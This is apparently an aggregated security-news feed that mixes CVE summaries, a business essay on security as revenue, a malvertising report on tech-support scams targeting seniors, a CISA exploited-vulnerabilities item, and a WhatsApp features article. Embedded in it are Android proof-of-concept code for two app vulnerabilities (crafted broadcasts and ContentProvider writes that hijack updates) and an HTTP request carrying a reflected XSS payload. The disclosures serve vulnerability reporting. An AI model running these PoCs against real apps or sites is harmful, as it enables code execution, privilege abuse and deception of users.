Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-2033

Focusing on what customers and partners need from a company can help CISOs show the real financial benefits of improving cybersecurity.

Security has historically been seen as a cost center, which has led to it being given as little money as possible. Many CISOs, CSOs, and CROs fed into that image by primarily talking in terms of disaster avoidance, such as data breaches hurting the enterprise and ransomware potentially shutting it down.

But what if security presented itself instead as a way to boost revenue and increase market share? That could easily shift those financial discussions into something much more comfortable.

For example, Apple touted its investments into the secure enclave to claim that it offers users better privacy. Specifically, the company argued that it couldn't reveal information to federal authorities because the enclave was just that secure. Apple turned that into a powerful competitive argument against rival Android creator Google, which makes much of its revenue by monetizing users' data.

In another scenario, bank regulations require financial institutions to reimburse customers who are victimized by fraudsters, but they carve out an exception for wire fraud. Imagine a bank realizes that covering all fraud — even though it is not required to do so — could be a powerful differentiator that would boost its market share by supporting customers better than competitors do. How can the bank afford to do this? It increases security investments to the point where the projected fraud losses are materially less than the projected increase in revenue.

Or look at the case of a cloud provider, which could differentiate itself from most major cloud providers by improving uptime performance by focusing on reducing DDoS attack damage. Even further afield, an agriculture company that invested in better security could improve trust and bring in more partners, thus expanding into lucrative new markets. A wide range of companies can make the case for improving overall business performance by improving cybersecurity.

**Case Study: Brokering Cyber Insurance**

Another example of leveraging security to explicitly boost revenue comes from Marsh McLennan, a $10 billion business that bills itself as the world's largest insurance broker.

One of the biggest recent trends in cybersecurity insurance are insurance companies refusing to insure many enterprises because the enterprise does not have security that meets the strict requirements of that insurer. Although this does limit their potential losses, it also immediately threatens insurance companies' revenue because of the loss of premium income.

To maximize the number of companies that it can deliver to insurance companies, and thereby maintain its own revenue, Marsh evaluates companies. When a company's security profile isn't sufficient, Marsh taps its security company partners to bring that potential client's security profile up to where it qualifies for a policy with the insurance company. That's good for the company because it is able to get insurance and enjoy better security, it's good for the insurance company because it gets the premium revenue, and it's good for Marsh, which makes a proper and successful referral.

"We look at the client relationship as a holistic life cycle. Placing insurance is our bread and butter," says Katherine Keefe, leader of cyber incident management at Marsh. "Our clients need support in readiness: how to prepare, how to develop an incident response plan \[or\] tabletop exercises. We provide them with tools and solutions and support cyber preparation."

**Shifting From Defense to Growth**

Stephen Boyce, a director at Magnet Forensics, argues that when enterprise security executives focus on what prospects care about, and therefore help with revenue and market share, it can be the single most effective way to improve the security posture.

"What it does is create a shift in the relationship dynamic between the CISO and the CFO, and potentially the rest of the C-level team," Boyce says.

This does indeed have the potential to change the relationship dynamic, but SailPoint CISO Rex Booth stresses that such a change can only happen if the enterprise is ready for it. And, he adds, many are not yet.

"For way too long, security has been \[focused\] on conflict, where it should be an enabling function. And that does require a shift in the relationship dynamic of the CISO — a role that has traditionally been seen as purely risk reduction," Booth says. "This needs to happen at the proportion of companies that are mature enough to take their CISO and dual-hat them into not only a security role, but a revenue-generating role. Some are migrating in this direction, but most organizations are not there yet."

**Proving Value by Improving the Business**

Still, Booth says there are pros and cons at play. The argument against such a change — or at least slowing it way down — is that security departments today are severely underbudgeted, which means they are understaffed and find it difficult to properly defend the enterprise. That suggests that attempts to support sales will further dilute their attention and make a bad situation potentially worse.

The counter to that is that underbudgeted security operations are likely to always be underbudgeted. By making periodic moves to help sales — maybe just once or twice a year — it could illustrate to the CFO, the COO, the CEO, and the board the potential for using security to help with the bottom line. And, in theory, that could meaningfully contribute to security being budgeted a little better, which itself could be a huge help in defending the enterprise.

That is even more critical given that the core efforts of security are often difficult to prove from a value ROI perspective.

"If I do everything right from a security perspective, there's no way for me to tell the board, 'I saved you $2 million because of those ransomware events that never happened,'" Booth says.

The goal should go beyond getting prospects to convert to customers and increasing market share and needs to include customer retention, argues Bob Hansmann, cyber-risk and security product marketing leader for Infoblox.

"The enterprise needs to make sure that the services are not just up and available, but that they run smoothly," Hansmann says. "And security is the unit that is best positioned — in terms of experience, talent, and tools — to make that happen."

Security Is a Revenue Booster, Not a Cost Center

SENAYAN Library Management System (SLiMS) Bulian v9.5.2 does not strip exif data from uploaded images. This allows attackers to obtain information such as the user's geolocation and device information.

**Describe the bug**  
When a user uploads an image in "SLiMS 9 Bulian official source code", the uploaded image’s EXIF Geolocation Data does not gets stripped. As a result, anyone can get sensitive information of "SLiMS 9 Bulian official source code" users like their Geolocation, their Device information like Device Name, Version, Software & Software version used etc.

**CMS Version:**  
v9.5.2

**Affected URL:**  
http://127.0.0.1/bulian/admin/index.php?mod=membership

**To Reproduce**  
Steps to reproduce the behavior:

1.  Got to Github ( https://github.com/ianare/exif-samples/tree/master/jpg)
2.  There are lot of images having resolutions (i.e 1280 \* 720 ) , and also whith different MB’s .  
    login your admin panel and membership menu and upload photo in any member profile.
3.  see the path of uploaded image ( Either by right click on image then copy image address OR right click, inspect the image, the URL will come in the inspect , edit it as html )
4.  open it (https://www.verexif.com/en/index.php)
5.  See whether is that still showing exif data , if it is then Report it.

**Proof Of Concept:**  
You can see the Proof of Concept. which I've attached screenshots and video to confirm the vulnerability.

**Screenshots**  
  
  
  

**Video**

**Desktop (please complete the following information):**

*   OS: Windows 10
*   Browser: Google Chrome

**Impact**  
This vulnerability is CRITICAL and impacts all the "SLiMS 9 Bulian official source code" customer base. This vulnerability violates the privacy of a User and shares sensitive information of the user who uploads an image on SLiMS 9 Bulian official.

Let me know if any further info is required.

Thanks & Regards  
**Rahad Chowdhury**  
Cyber Security Specialist  
https://www.linkedin.com/in/rahadchowdhury

CVE-2023-29850: EXIF Geolocation Data Not Stripped From Uploaded Images · Issue #186 · slims/slims9_bulian

Directory Traversal vulnerability found in T-ME Studios Change Color of Keypad v.1.275.1.277 allows a remote attacker to execute arbitrary code via the dex file in the internal storage.

Permalink

Cannot retrieve contributors at this time

**Code execution exists in Change Color Of Keypad（CVE-2023-27648）**

Vendor：T-ME Studios (https://corporate.timmystudios.com/)

Affected product：Change Color Of Keypad (com.jb.gokeyboard.theme.twchangecolorofkeypad)

Version：11.275.1.277

Download link：https://play.google.com/store/apps/details?id=com.jb.gokeyboard.theme.twchangecolorofkeypad

Description of the vulnerability for use in the CVE：Directory Traversal vulnerability found in T-ME Studios Change Color of Keypad v.1.275.1.277 allows a remote attacker to execute arbitrary code via the dex file in the internal storage.

poc：

private void attack() {
    while (true) {
        Intent intent = new Intent();
        ComponentName componentName = new ComponentName("com.jb.gokeyboard.theme.twchangecolorofkeypad", "com.timmystudios.redrawkeyboard.themes.SuperThemeReceiver");
        intent.setComponent(componentName);
        intent.setAction("com.timmystudios.redrawkeyboard.intent.action.THEME\_APPLIED");
        intent.putExtra("package-name","com.ludashi.xsuperclean");
        intent.putExtra("selected-font",true);
        intent.putExtra("font\_name","hack");
        intent.putExtra("font\_id","2");
        intent.putExtra("font\_resource","hackkkk");
        intent.putExtra("font\_size",123456);
        intent.putExtra("selected-sound",true);
        intent.putExtra("sound\_name","hack");
        intent.putExtra("sound\_id","2");
        intent.putExtra("sound\_resource","hackkkk");
        intent.putExtra("sound\_size",123456);
        intent.putExtra("go\_theme\_id",3);
        intent.putExtra("go\_res\_zip\_path","/data/local/tmp/test.zip");
        System.out.println("发送的数据大小：" + legnth);
        try {
            System.out.println("发送数据");
            sendBroadcast(intent);
        } catch (Exception e) {
        }
    }
}

CVE-2023-27648: SODA/CVE detail.md at main · LianKee/SODA

An issue found in Ego Studio SuperClean v.1.1.9 and v.1.1.5 allows an attacker to gain privileges via the update_info field of the _default_.xml file.

**Escalation of Privileges exists in Super Clean（CVE-2023-27651）**

Vendor：Ego Studio(http://www.egostudiogroup.com/)

Affected product：Super Clean(com.egostudio.clean)

Version：1.1.5 1.1.9

Download link：https://apkpure.com/cn/super-clean-phone-cleaner/com.egostudio.clean/download

Description of the vulnerability for use in the CVE：An issue found in Ego Studio SuperClean v.1.1.9 and v.1.1.5 allows an attacker to gain privileges via the update\_info field of the _default_.xml file.

Additional information：Super Clean is a phone cleaner app for cleaning junk files and optimizing memory usage, it also provides various security-related features such as Wifi security check, app lock, etc. Upon opening, the app loads the SharedPreference files into memory and uses the data in some important functions. If a malicious app modifies important data in the SharedPreference files, the Super Clean app will not behave properly when loading this data.

​ The attackers can use the update() method in the SharedPrefProvider component exposed by the APP to modify the contents of the SharedPreference file of the APP. The file '**default**.xml' contains a key-value pair named key\_self\_update\_config which records data related to APP updates. By changing the ‘appver’ and ‘type’ fields in the value, the attackers can force the app to trigger the update function. They can then hijack the hint message shown to the user in the update UI by modifying the ‘update\_info‘ field to mislead the user. Finally, by modifying the ’packageName‘ field, they can arbitrarily specify the link to which the update button points. (Note that packageName can only be the name of the application package listed in Google Play Market.) This can result in users being induced to download the app specified by the attacker in the application market.

​ Attackers can use similar methods to cause a variety of security hazards. For example, they can allow malicious apps to add themselves to the virus check whitelist (by modifying the KEY\_VIRUS\_SCAN\_WHITELIST field), force the app to initialize all settings (by modifying the key\_init\_app\_finish field), block ads (by modifying the key\_ad\_new\_user\_avoid\_time field, which affects the developer's advertising revenue), or control the server URL that the victim app is going to access (by modifying the key\_wifi\_safe\_net\_check\_url field).To make matters worse, users cannot fix the security issues by simply restarting the app, since the injected data is persistent in the SharedPreference files.

poc：

public void attack(){
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.egostudio.clean.boost.main.SharedPrefProvider");
    while (true) {
        ContentValues contentValues = new ContentValues();
        contentValues.put("file\_name","\_\_default\_\_");
        contentValues.put("type",4);
        contentValues.put("key","key\_self\_update\_config");
        contentValues.put("value","{\\"channel\\":\\"clean\\",\\"country\\":\[\\"全部\\"\],\\"appver\\":1000,\\"enable\\":true,\\"force\_update\\":true,\\"type\\":1002,\\"packageName\\":\\"com.wuxiafield.novastar\\",\\"jumpurl\\":\\"https:\\\\/\\\\/play.google.com\\\\/store\\\\/apps\\\\/details?id=com.wuxiafield.novastar\\",\\"interval\_time\\":6,\\"update\_info\\":\[\\"hshadhashdsahdhsadhashdhasdhsahdas\\"\]}");
        contentResolver.update(uri,contentValues,null,null);
    }
}

CVE-2023-27651: SODA/CVE detail.md at main · LianKee/SODA

Categories: Threat Intelligence
Tags: malvertising

Tags: weebly

Tags: google

Tags: ads

Tags: seniors

Tags: recipe

Tags: tech support

Tags: scam

Scammers are buying ads on for the most common Google searches made by seniors and defrauding them with tech support scams.



(Read more...)




The post Massive malvertising campaign targets seniors via fake Weebly sites appeared first on Malwarebytes Labs.

Knowing their audience is something scammers excel at, and for very good reason. This is particularly true for tech support scammers whose prime targets are seniors.

By understanding what retirees are searching for and abusing various online platforms, crooks can precisely go after the demographic they are interested in and lure them onto sites that they control.

We have been observing a specific malvertising campaign via Google ads aimed at seniors. The threat actor is creating hundreds of fake websites via the Weebly platform to host decoy content to fool search engines and crawlers while redirecting victims to a fake computer alert.

Based on our analysis, this particular scheme started sometime in the summer of 2022 but has drastically increased in prevalence in the past month. While we have been sharing details with affected parties privately for a few weeks, we are now exposing what we know. 

**Popular search terms**

Malvertising, or the use of ads to deliver malicious content, is not something new. Yet, over the years various threat actors have used it for different purposes.

It is a cost effective and efficient way to reach targets and then monetize those with a certain payload that can be anything from malicious software or plain old scams. But we don’t tend to hear about the latter as much because the impact of scams may be harder to quantify.

In talking to victims, you will often hear them describe that they were just looking up for something and clicked somewhere when all the sudden this or that happened.

As we saw an increase in our telemetry for tech support scam pages, we decided to replicate some of those searches and came up with keywords we thought the senior/retired audience might use often. In order to maximize our chances of identifying the campaign we used a real machine and prepared with a specific profile.

By far, anything related to recipes and cooking is a popular search query. We had previously identified another malvertising campaign using this same theme.

We also tried to look for games such as Solitaire:

And of course, we couldn’t do without checking on the weather:

**Decoy sites**

While the links for the sponsored sites may look legitimate, they aren’t. The problem is that unless you are the intended victim, you will only see the clean content. It matters because crawlers and other ad quality check tools may validate the advertiser and allow the ad to be reached by a large audience.

Each site is very simple and contains content that was stolen from somewhere else and put together hastily.

The threat actor has been creating hundreds of those websites via the Weebly platform which they are abusing. Some days, we saw an average of 10 new Weebly hostnames used by the scammers.

**Cloaking**

As mentioned earlier, it is important for the scammers to stay under the radar and make it as though these webpages are legitimate. They can do this easily by using a technique known as cloaking.

Cloaking is simply showing different content based on a target audience and being able to hide the payload from some non desirable visitors (i.e. web crawlers, security researchers).

The scammers did this in various ways, some quite simple (user-agent and IP check) but they also paid for a professional cloaking service.

The cloaker API will return a response that contains two different links:

*   The “safe\_page” which is the URL for the decoy Weebly site
    
*   The “money\_page” which is the URL to make money from
    

In this case the money page is a URL belonging to Digital Ocean and hosting a tech support scam page.

**Tech support scam**

Most scammers will use a template for the tech support scam page which is customized for the operating system and browser the victim is running. This scheme is adapted for both Windows and Mac, supporting the Chrome, Opera, Safari and Firefox browsers.

In this case they are also abusing a browser feature that remaps keystrokes when a page is in fullscreen by targeting the navigator.keyboard.lock API. What this means in practical terms is that the user will not be able to exit from the fullscreen page unless they press and hold the Escape key for several seconds. Many people will panic and call the phone number on the screen, only to fall in the hands of scammers and lose hundreds, sometimes even thousands of dollars.

**Protection from malvertising attacks**

Malvertising can come in different forms and ad formats, and the same can be said about the payloads that are distributed.

As we saw earlier this year, clicking on the top ad for a software download doesn’t always get you what you wanted, in fact it can infect your computer with malware. Threat actors are very good at impersonating legitimate brands and setting convincing websites.

We have reported and continue to report this malvertising campaign to Google and Block Inc. (Weebly).

We always recommend using a layered approach to security and for malvertising you will need web protection combined with anti-malware protection. Malwarebytes Premium for consumers and Endpoint Protection for businesses provide real-time protection against such threats.

TRY NOW

Massive malvertising campaign targets seniors via fake Weebly sites

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
The two flaws are listed below -

CVE-2023-20963 (CVSS score: 7.8) - Android Framework Privilege Escalation Vulnerability
CVE-2023-29492 (CVSS score: TBD) - Novi Survey Insecure Deserialization Vulnerability

Mobile Security / Cyber Threat

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.

The two flaws are listed below -

*   **CVE-2023-20963** (CVSS score: 7.8) - Android Framework Privilege Escalation Vulnerability
*   **CVE-2023-29492** (CVSS score: TBD) - Novi Survey Insecure Deserialization Vulnerability

"Android Framework contains an unspecified vulnerability that allows for privilege escalation after updating an app to a higher Target SDK with no additional execution privileges needed," CISA said in an advisory for CVE-2023-20963.

Google, in its monthly Android Security Bulletin for March 2023, acknowledged "there are indications that CVE-2023-20963 may be under limited, targeted exploitation."

The development comes as tech news site Ars Technica disclosed late last month that Android apps digitally signed by China's e-commerce company Pinduoduo weaponized the flaw to seize control of the devices and steal sensitive data, citing analysis from mobile security firm Lookout.

Chief among the capabilities of the malware-laced app includes inflating the number of Pinduoduo daily active users and monthly active users, uninstalling rival apps, accessing notifications and location information, and preventing itself from being uninstalled.

CNN, in a follow-up report published earlier this month, said an analysis of the 6.49.0 version of the app revealed code designed to achieve privilege escalation and even track user activity on other shopping apps.

The exploits allowed the malicious app to access users' contacts, calendars, and photo albums without their consent and requested a "large number of permissions beyond the normal functions of a shopping app," the news channel said.

It's worth pointing out that Google suspended Pinduoduo's official app from the Play Store in March, citing malware identified in "off-Play versions" of the software.

UPCOMING WEBINAR

Master the Art of Dark Web Intelligence Gathering

Learn the art of extracting threat intelligence from the dark web – Join this expert-led webinar!

Save My Seat!

That said, it's still not clear how these APK files were signed with the same key used to sign the legitimate Pinduoduo app. This either points to a key leak, the work of a rogue insider, a compromise of Pinduoduo's build pipeline, or a deliberate attempt by the Chinese company to distribute malware.

The second vulnerability added to the KEV catalog relates to an insecure deserialization vulnerability in Novi Survey software that allows remote attackers to execute code on the server in the context of the service account.

The issue, which impacts Novi Survey versions prior to 8.9.43676, was addressed by the Boston-based provider earlier this week on April 10, 2023. It's currently not known how the flaw is being abused in real-world attacks.

To counter the risks posed by the vulnerabilities, Federal Civilian Executive Branch (FCEB) agencies in the U.S. are advised to apply necessary patches by May 4, 2023.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Severe Android and Novi Survey Vulnerabilities Under Active Exploitation

Categories: News
Tags: WhatsApp

Tags:  security features

Tags:  Account Protect

Tags:  Device Verification

Tags:  Key Transparency

Tags:  Auditable Key Directory 

WhatsApp has announced several new security features, including one that makes it a lot easier for you to verify the contact you are communicating with.



(Read more...)




The post WhatsApp introduces new security features appeared first on Malwarebytes Labs.

Posted: April 14, 2023 by

WhatsApp has announced several new security features which include an extra check when an account is transferred to a new device. This check asks that users confirm the transfer on their old device. This should warn users in case there is a transfer in progress started by somebody trying to hijack their account.

This Account Protect feature may have been triggered by an increase in account take-overs, like the one we reported about a few months ago, where cybercriminals take over your account while you are away from your device.

Another new security feature is Device Verification, which is mainly meant to stop malware on a device from sending spam and phishing messages. This specifically targets fake versions of WhatsApp that contain malware. WhatsApp uses cryptographic keys to ensure that communications across the app are end-to-end encrypted. One of these encryption keys is the authentication key. The authentication key allows a WhatsApp client to connect to the WhatsApp server to establish a connection based on previously established trust, so the users don’t have to enter a password, PIN, SMS code, or other credential each and every time they turn on the app.

This mechanism is secure because the authentication key cannot be intercepted by any third party, including WhatsApp. But, if a device is infected with malware the authentication key can be stolen and abused for nefarious purposes. These purposes include impersonating the victim to send spam, scams, and phishing attempts to other potential victims.

WhatsApp uses three different methods that benefit from how people typically read and react to messages sent to their device to distinguish between a connection request of the actual user or one started by malware.

The Device Verification feature is only available for Android users at the moment, iOS users can expect it to be rolled out shortly.

The third new feature we want to highlight is Key Transparency, which allows users to automatically check they are using a secured connection. End-to-end encryption is the foundation of private messaging on WhatsApp, helping to ensure that only you and the person you’re communicating with can read what’s sent, and nobody in between, not even WhatsApp.

In fact, the option to verify the keys on the other end of the conversation already existed, but the method was rather complicated—comparing a a 60-digit number—and this feature can now be replaced with a new Auditable Key Directory (AKD). This AKD means that WhatsApp has a Security Page for each contact that has a QR code and a 60-digit number that can be verified outside of WhatsApp to make sure it matches what your contact sees on their device. In short, it’s a unique hash of both your public keys and their public keys, so if either of you have the wrong value, the hashes won’t match.

The old methods required QR code scanning for in person contact, or the number matching feature. But either way required communicating with your contacts outside of WhatsApp and was near impossible to do in larger groups.

**Making WhatsApp more secure**

These security features will be made available for all devices in the coming months. Until then there are a few things you can do yourself to make WhatsApp more secure.

*   Only install WhatsApp from the Apple App Store or Google Play, to avoid getting an infected version of the app.
*   Enable two-step verification:

1.  Open Settings in WhatsApp under More (three vertical dots) > Settings
2.  Tap Account > Two-step verification > Enable.
3.  Enter a six-digit PIN.
4.  Enter an email address, or tap Skip if you don’t want to. WhatsApp says it recommends adding an email address so you can reset two-step verification if you need to.
5.  Tap Next.
6.  Confirm the details and tap Save or Done.

*   Use of end-to-end encrypted backups:

1.  Open Settings in WhatsApp under More (three vertical dots) > Settings
2.  Tap Chats > Chat Backup > End-to-end Encrypted Backup.
3.  Tap Turn On, then follow the prompts to create a password or key.
4.  Tap Create, and wait for WhatsApp to prepare your end-to-end encrypted backup. You might need to connect to a power source.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

**RELATED ARTICLES**

WhatsApp introduces new security features

Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.

The value of the password request parameter is copied into the HTML document as plain text between tags. The payload uay4ws4m6g was submitted in the password parameter. This input was echoed unmodified in the application's response.

    POST /purchase_order/classes/Login.php?f=login HTTP/1.1
    Host: localhost
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: PHPSESSID=83loqso6i0hee5lpfufibf68o5
    Origin: http://localhost
    X-Requested-With: XMLHttpRequest
    Referer: http://localhost/purchase_order/admin/login.php
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 37
    
    username=gAjjuMUL&password=k8Z!h2w!V7uay4w%3cimg%20src%3da%20onerror%3dalert(1)%3es4m6g

CVE-2023-29623: CVE-nu11secur1ty/vendors/oretnom23/2023/Purchase-Order-Management-1.0/XSS-Reflected at main · nu11secur1ty/CVE-nu11secur1ty

In spring framework versions prior to 5.2.24 release+ ,5.3.27+ and 6.0.8+ , it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition.

**Description**

In Spring Framework versions 6.0.0 - 6.0.7, 5.3.0 - 5.3.26, 5.2.0.RELEASE - 5.2.23.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition.

**Affected Spring Products and Versions**

*   Spring Framework
    *   6.0.0 to 6.0.7
    *   5.3.0 to 5.3.26
    *   5.2.0.RELEASE to 5.2.23.RELEASE
    *   Older, unsupported versions are also affected

**Mitigation**

Users of affected versions should apply the following mitigation: 6.0.x users should upgrade to 6.0.8+. 5.3.x users should upgrade to 5.3.27+. 5.2.x users should upgrade to 5.2.24.RELEASE+. Users of older, unsupported versions should upgrade to 6.0.8+ or 5.3.27+. No other steps are necessary. Releases that have fixed this issue include:

*   Spring Framework
    *   6.0.8+
    *   5.3.27+
    *   5.2.24.RELEASE+

**Credit**

This vulnerability was initially discovered and responsibly reported by the Google OSS-Fuzz team from Code Intelligence.

**References**

*   https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/RL:O
*   https://cwe.mitre.org/data/definitions/770.html

**History**

*   2023-04-13: Initial vulnerability report published.

Tag

#google